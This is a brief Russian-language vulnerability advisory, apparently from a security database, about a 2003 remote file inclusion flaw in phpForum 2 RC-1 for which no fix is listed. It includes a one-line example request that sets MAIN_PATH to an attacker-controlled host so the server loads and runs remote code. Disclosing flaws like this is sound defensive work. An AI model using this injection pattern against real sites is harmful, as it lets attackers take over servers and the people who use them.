Удаленное выполнение произвольного кода в phpForum

Дата публикации:
16.07.2003
Всего просмотров:
778
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phpForum 2.x
Описание:

Уязвимость обнаружена в phpForum. Удаленный пользователь может выполнить произвольный код на системе.

Удаленный пользователь может вызвать 'mainfile.php' сценарий и определить альтернативное расположение для '$MAIN_PATH' переменной, чтобы включить произвольный 'config.php' сценарий, расположенный на сервере атакующего. Пример:

http://[target]/forum/mainfile.php?MAIN_PATH=http://[attacker]

Уязвимость обнаружена в phpForum 2 RC-1

Способов устранения обнаруженной уязвимости не существует в настоящее время.



Ссылки: PHP-Include-Hack-Possibility in phpforum 2 RC-1
или введите имя

CAPTCHA